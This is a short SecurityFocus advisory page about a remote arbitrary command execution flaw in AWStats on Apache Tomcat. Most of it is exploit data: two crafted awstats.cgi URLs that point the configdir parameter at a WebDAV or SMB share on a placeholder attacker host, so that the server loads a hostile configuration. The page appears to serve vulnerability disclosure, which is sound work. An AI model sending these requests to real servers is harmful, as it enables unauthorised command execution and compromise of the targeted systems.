Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability

The following exploit data is available:

Attacking Windows XP Apache Tomcat AWStats Server:
http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress:80\webdav

Attacking Windows 2003 or Windows XP AWStats Server:
http://www.example.com/cgi-bin/awstats.cgi?config=attacker&pluginmode=rawlog&configdir=\\Attacker-IPAddress\SMB-Share


 

Privacy Statement
Copyright 2010, SecurityFocus